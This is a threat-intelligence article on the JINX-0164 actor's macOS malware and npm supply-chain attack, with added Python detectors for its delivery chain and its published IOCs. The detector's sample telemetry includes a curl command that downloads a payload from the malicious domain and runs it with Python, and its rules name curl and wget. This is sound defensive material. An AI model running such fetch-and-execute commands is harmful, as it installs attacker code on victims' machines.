New Threat Actor 'JINX-0164' Targets Crypto Firms with Custom macOS Malware

Source: CyberNetSec.io | Severity: HIGH | May 28, 2026 | 4 min read

JINX-0164: Financially Motivated Actor Uses Social Engineering and Custom macOS Malware in Crypto Heists

Tags: Threat Actor, Malware, Supply Chain Attack

Related Entities

Threat Actors: JINX-0164, BlueNoroff

Organizations: Wiz

Other: AUDIOFIX, MiniRAT, LinkedIn

MITRE ATT&CK Techniques

T1566.002 (Initial Access): Phishing: Spearphishing Link

T1204.002 (Execution): User Execution: Malicious File

T1105 (Command and Control): Ingress Tool Transfer

T1195.002 (Initial Access): Compromise Software Supply Chain: Compromise Software Dependencies


Executive Summary

Security researchers at Wiz have identified a new, financially motivated threat actor, dubbed JINX-0164, that specializes in targeting developers at cryptocurrency firms with custom macOS malware. Active since at least mid-2025, the group employs a multi-stage attack that begins with sophisticated social engineering on professional networks like LinkedIn. Victims are tricked into downloading what appears to be a meeting client, which instead deploys a custom Python-based infostealer and Remote Access Trojan (RAT) named AUDIOFIX. JINX-0164 has also demonstrated supply chain attack capabilities, previously distributing a Go-based backdoor called MiniRAT through a malicious version of a legitimate npm package. The ultimate goal is the theft of digital assets by compromising developer machines and CI/CD pipelines.

Threat Overview

Threat Actor: JINX-0164

Targeting: Developers and engineers within the cryptocurrency industry.

Malware:

AUDIOFIX: A Python-based macOS infostealer and RAT.

MiniRAT: A Go-based backdoor.

Attack Vectors: Social engineering, supply chain attack (compromised npm package).

Motivation: Financial gain through theft of cryptocurrency.

Technical Analysis

The attack chain used by JINX-0164 is well-orchestrated and tailored to its targets:

Reconnaissance & Luring (T1589 - Gather Victim Identity Information): The actor identifies developers at crypto firms on LinkedIn and initiates contact with fake job offers or meeting requests.

Initial Access (T1566.002 - Phishing: Spearphishing Link): The target is directed to a malicious domain impersonating a legitimate service (e.g., apple.driver-store[.]com).

Execution (T1204.002 - User Execution: Malicious File): The user is tricked into downloading and running a malicious file disguised as a meeting client. This file is a bash script.

Command and Control / Payload Retrieval (T1105 - Ingress Tool Transfer): The initial bash script downloads the main payload, the AUDIOFIX malware, from the attacker-controlled domain.

Malware Capabilities (AUDIOFIX): The Python RAT can upload files from the victim's machine, execute arbitrary shell commands, and download additional payloads, giving the attacker full control.

Supply Chain Attack (T1195.002 - Compromise Software Supply Chain: Compromise Software Dependencies): In a separate TTP, the actor compromised the @velora-dex/sdk npm package to distribute the MiniRAT backdoor, showing a higher level of sophistication.

While some TTPs, like targeting crypto developers and using VPN services, are similar to North Korean APT groups like BlueNoroff, researchers have not found sufficient evidence to attribute JINX-0164 to them at this time.
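The delivery chain above (a user-launched shell script fetches AUDIOFIX, then a Python interpreter runs and talks to the network) is the kind of parent/child relationship a macOS EDR can alert on without knowing any indicator in advance. The following is an added example written for this page, not Wiz's detection logic or anything from the article: it runs a process-tree heuristic over a constructed EDR-style event list. The downloader name (curl/wget), the payload path and the benign comparison events are all assumptions; the article only says the script downloads the payload.

```python
"""Process-chain heuristic for the AUDIOFIX delivery pattern (added example,
hypothetical helper). Flags: shell running a script from a user-writable
location -> child that downloads something -> child Python interpreter with
an outbound connection. Events below are constructed, not real telemetry."""
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    exe: str                      # executable name as the EDR reports it
    cmdline: str
    net_dst: Optional[str] = None  # outbound connection "host:port", if any


# Constructed sample telemetry. PIDs 101-103 mimic the chain described in the
# article; PIDs 200-201 are a benign developer running a test script.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "Terminal", "/System/Applications/Utilities/Terminal.app"),
    ProcEvent(101, 100, "bash", "bash /Users/dev/Downloads/MeetingClient.sh"),
    # assumed downloader and a placeholder payload path on the published IOC domain
    ProcEvent(102, 101, "curl",
              "curl -s https://apple.driver-store.com/PLACEHOLDER.py -o /tmp/PLACEHOLDER.py",
              "apple.driver-store.com:443"),
    ProcEvent(103, 101, "python3", "python3 /tmp/PLACEHOLDER.py",
              "apple.driver-store.com:443"),
    ProcEvent(200, 100, "bash", "bash ./run_tests.sh"),
    ProcEvent(201, 200, "python3", "python3 -m pytest"),
]

SHELLS = {"bash", "sh", "zsh"}
INTERPRETERS = {"python", "python3"}
DOWNLOADERS = {"curl", "wget"}          # assumption: article names no tool
USER_DIRS = ("/Users/", "/tmp/", "/private/tmp/")


def find_delivery_chains(events):
    """Return one alert dict per Python child that matches the full pattern."""
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)

    alerts = []
    for shell in events:
        if shell.exe not in SHELLS:
            continue
        # script argument lives somewhere a user (or a download) can write to
        script_in_user_dir = any(tok.startswith(USER_DIRS)
                                 for tok in shell.cmdline.split())
        kids = children.get(shell.pid, [])
        downloaded = any(k.exe in DOWNLOADERS and k.net_dst for k in kids)
        py_with_net = [k for k in kids if k.exe in INTERPRETERS and k.net_dst]
        if script_in_user_dir and downloaded and py_with_net:
            for k in py_with_net:
                alerts.append({
                    "shell_pid": shell.pid,
                    "script": shell.cmdline,
                    "python_pid": k.pid,
                    "dst": k.net_dst,
                })
    return alerts


if __name__ == "__main__":
    for alert in find_delivery_chains(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

Treat hits as triage leads rather than verdicts: a developer running a setup script from their home directory that installs and then launches a Python tool would match the same shape, so the destination host and the script's origin (quarantine attribute, download source) are what separate the two cases.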

Impact Assessment

JINX-0164 poses a significant threat to the cryptocurrency ecosystem. By specifically targeting developers and their CI/CD infrastructure, the group aims to compromise systems at the heart of digital asset management. A successful attack could lead to:

Theft of private keys from developer machines.

Compromise of code repositories to inject malicious code into smart contracts or applications.

Large-scale theft of funds from the targeted company or its users.

Significant reputational damage and loss of trust in the compromised platform.

The use of custom macOS malware shows that attackers are increasingly focusing on Apple's platform as it becomes more prevalent in corporate and development environments.

IOCs — Directly from Articles

Type: domain
Value: apple.driver-store[.]com
Description: Malicious domain used to host malware payloads.

Type: package_name
Value: @velora-dex/sdk
Description: Compromised npm package used to distribute MiniRAT.

Detection & Response

Endpoint Monitoring (macOS): Use EDR solutions with macOS support to monitor for suspicious process execution, especially Python scripts running with unusual permissions or making network connections.

Network Filtering: Block known malicious domains like apple.driver-store[.]com at the network perimeter.

Dependency Scanning: For development teams, use tools to scan software dependencies for known vulnerabilities or...
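The two IOCs the article publishes (the defanged domain and the npm package name) map directly onto the Network Filtering and Dependency Scanning items. The following is an added example, not tooling from the article or from Wiz: it refangs the domain, sweeps constructed DNS resolver log lines for queries to it or any subdomain, and walks a constructed package-lock.json (both the v2/v3 `packages` map and the older nested `dependencies` map) for the compromised package. The log format and lockfile contents are assumptions; because the article does not name the malicious version, any installed version of the package is reported for manual comparison against the advisory.

```python
"""Match the article's two IOCs against DNS logs and an npm lockfile.
Added example with hypothetical helpers; sample inputs are constructed."""
import json
import re

# Indicators exactly as published (defanged) in the article.
IOC_DOMAINS_DEFANGED = ["apple.driver-store[.]com"]
IOC_NPM_PACKAGES = {"@velora-dex/sdk"}


def refang(indicator: str) -> str:
    """Turn 'example[.]com' back into 'example.com' for matching."""
    return indicator.replace("[.]", ".")


IOC_DOMAINS = {refang(d).lower() for d in IOC_DOMAINS_DEFANGED}


def domain_matches(qname: str) -> bool:
    """True if qname equals a listed domain or is a subdomain of one.
    'driver-store.com' alone does NOT match 'apple.driver-store.com'."""
    q = qname.rstrip(".").lower()
    return any(q == d or q.endswith("." + d) for d in IOC_DOMAINS)


# Assumed resolver log layout: "<timestamp> <client-ip> query <qname> <qtype>"
DNS_LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\s+(?P<qname>\S+)\s+(?P<qtype>\S+)$")


def scan_dns_log(lines):
    """Return (timestamp, client, qname) for each query to an IOC domain."""
    hits = []
    for line in lines:
        m = DNS_LOG_RE.match(line.strip())
        if m and domain_matches(m["qname"]):
            hits.append((m["ts"], m["client"], m["qname"]))
    return hits


def scan_lockfile(lock_json: str):
    """Return sorted (package, version) pairs matching the IOC package list.
    Handles lockfileVersion 2/3 ('packages' keyed by node_modules paths,
    including nested installs) and lockfileVersion 1 ('dependencies' tree)."""
    data = json.loads(lock_json)
    found = set()

    for path, meta in data.get("packages", {}).items():
        # "node_modules/a/node_modules/@scope/pkg" -> "@scope/pkg"
        name = path.split("node_modules/")[-1]
        if name in IOC_NPM_PACKAGES:
            found.add((name, meta.get("version", "?")))

    def walk(deps):
        for name, meta in deps.items():
            if name in IOC_NPM_PACKAGES:
                found.add((name, meta.get("version", "?")))
            walk(meta.get("dependencies", {}))

    walk(data.get("dependencies", {}))
    return sorted(found)


# Constructed sample inputs (not real telemetry).
SAMPLE_DNS_LOG = [
    "2026-05-28T10:01:02Z 10.0.0.15 query www.apple.com A",
    "2026-05-28T10:01:07Z 10.0.0.15 query apple.driver-store.com A",
    "2026-05-28T10:01:09Z 10.0.0.22 query cdn.apple.driver-store.com. A",
    "2026-05-28T10:02:00Z 10.0.0.22 query driver-store.com A",
]

SAMPLE_LOCKFILE = json.dumps({
    "name": "constructed-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "constructed-app", "dependencies": {"@velora-dex/sdk": "^1.0.0"}},
        "node_modules/@velora-dex/sdk": {"version": "1.0.0"},
        "node_modules/left-pad": {"version": "1.3.0"},
    },
})

if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_DNS_LOG):
        print("DNS hit:", hit)
    for pkg, ver in scan_lockfile(SAMPLE_LOCKFILE):
        print("Lockfile hit:", pkg, ver)
```

Run this against the CI runner's resolver logs as well as developer laptops: the article's impact section singles out CI/CD pipelines, and a lockfile check in the pipeline catches the dependency case before the build ever executes it.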
